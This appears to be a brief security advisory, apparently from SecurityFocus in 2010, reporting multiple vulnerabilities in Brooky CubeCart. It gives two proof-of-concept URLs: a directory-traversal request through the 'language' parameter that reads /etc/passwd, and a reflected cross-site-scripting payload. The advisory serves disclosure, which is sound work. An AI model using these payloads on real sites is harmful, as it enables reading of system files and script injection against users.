Brooky CubeCart Multiple Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/index.php?&language=../../../../../../../../etc/pa
sswd
http://www.example.com/index.php?&language=<script>var%20test_variable=31
337;alert(test_variable);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus